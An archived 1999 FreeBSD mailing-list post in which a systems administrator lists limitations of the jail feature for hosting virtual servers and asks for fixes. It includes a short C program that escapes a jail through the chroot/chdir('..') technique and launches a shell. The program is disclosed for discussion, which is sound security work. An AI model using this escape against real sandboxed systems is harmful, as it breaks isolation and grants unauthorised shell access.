From owner-freebsd-security Sat Sep 25 6:17:38 1999
Delivered-To: freebsd-security@freebsd.org
Received: from relay2.aha.ru (relay2.aha.ru [195.2.64.35]) by hub.freebsd.org (Postfix) with ESMTP id 5353D14EB9; Sat, 25 Sep 1999 06:17:31 -0700 (PDT) (envelope-from abb@zenon.net)
Received: from pb.hq.zenon.net (pb [195.2.64.18]) by relay2.aha.ru (8.9.3/8.9.3/aha-r/0.04B) with ESMTP id RAA46063; Sat, 25 Sep 1999 17:17:12 +0400 (MSD)
Received: from mp.hq.zenon.net (mp [192.168.9.150]) by pb.hq.zenon.net (8.9.3/8.9.3) with ESMTP id RAA67010; Sat, 25 Sep 1999 17:17:12 +0400 (MSD)
Received: (from abb@localhost) by mp.hq.zenon.net (8.9.3/8.9.3) id RAA81647; Sat, 25 Sep 1999 17:17:12 +0400 (MSD)
Message-ID: <19990925171712.A80535@zenon.net>
Date: Sat, 25 Sep 1999 17:17:12 +0400
From: Alexander Bezroutchko
To: freebsd-security@freebsd.org, freebsd-hackers@freebsd.org
Subject: about jail
References: <199909251302.RAA58030@grendel.sovlink.ru>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.93.2i
In-Reply-To: <199909251302.RAA58030@grendel.sovlink.ru>; from NT User on Sat, Sep 25, 1999 at 05:02:30PM +0400
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hello,

I am looking for a way to use the jail feature (when it is back-ported to
-STABLE) for providing virtual servers with root access (something like
www.servetheweb.com). Therefore I am investigating this feature more
closely. For now I have encountered the following problems:

* ping and traceroute don't work due to lack of permissions to create an
  icmp socket.
  I think it is simple to make a workaround for such problems: create a
  daemon listening on a unix domain socket for requests from a jail. The
  daemon will take the request and the pid of the requesting process,
  validate it, process it and return the answer to the client.

* only one IP address is available in a jail
  It is an acceptable limitation, but some daemons would like to use the
  localhost address (127.0.0.1).

* the whole kernel MIB is readable, and kern.hostname is writable from a jail
  I think we should restrict the information about the system available
  from a jail -- leave readable only the data required for the proper work
  of libc functions like gethostname, getpagesize, sysconf, etc.
  If we leave kern.hostname writable from a jail, we should add a new field
  to `struct jail', say `jailname'. It is necessary to identify exactly
  which jail a process belongs to. And /proc//status must show this value.
  (I think it will be useful to add displaying of `jailname' to ps and
  probably top).

* scheduling
  The scheduler must provide an equal time quantum to each jail. I think
  something like a "fair share scheduler" is required. Are there any plans
  to implement such a scheme in FreeBSD?

* resource limits
  The current resource limit scheme does not provide enough isolation of
  jails. For example, chgproccnt() maintains counters of the number of
  processes per uid, but they are system-wide. So the number of processes
  running in one jail will affect fork() in another jail.
  Also it would be great to have the ability to limit the number of
  simultaneous processes running in a jail and the memory consumed by the
  whole jail.

* it is possible to escape from a jail
  The following program escapes from a jail (tested under
  4.0-19990918-CURRENT):

  /* --- start of example ------------------------- */
  #include <assert.h>
  #include <unistd.h>

  const char *shell = "/bin/sh";
  const char *lowerdir = "/tmp";

  int main()
  {
      int i;

      assert(chdir("/") != -1);
      /* chroot to a subdirectory: the process keeps its cwd outside
       * the new root, so ".." can be walked up past it */
      assert(chroot(lowerdir) != -1);
      for (i = 0; i < 32; i++)
          assert(chdir("..") != -1);
      assert(chroot(".") != -1);
      assert(execl(shell, shell, NULL) != -1);
      return 0;
  }
  /* --- end of example --------------------------- */

  Does anybody know where I can find more information about well-known
  methods of breaking chroot?

Has anybody already encountered and solved the problems described above, or
does anybody have any ideas?

--
Alexander Bezroutchko, Systems Administrator, Zenon N.S.P.

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message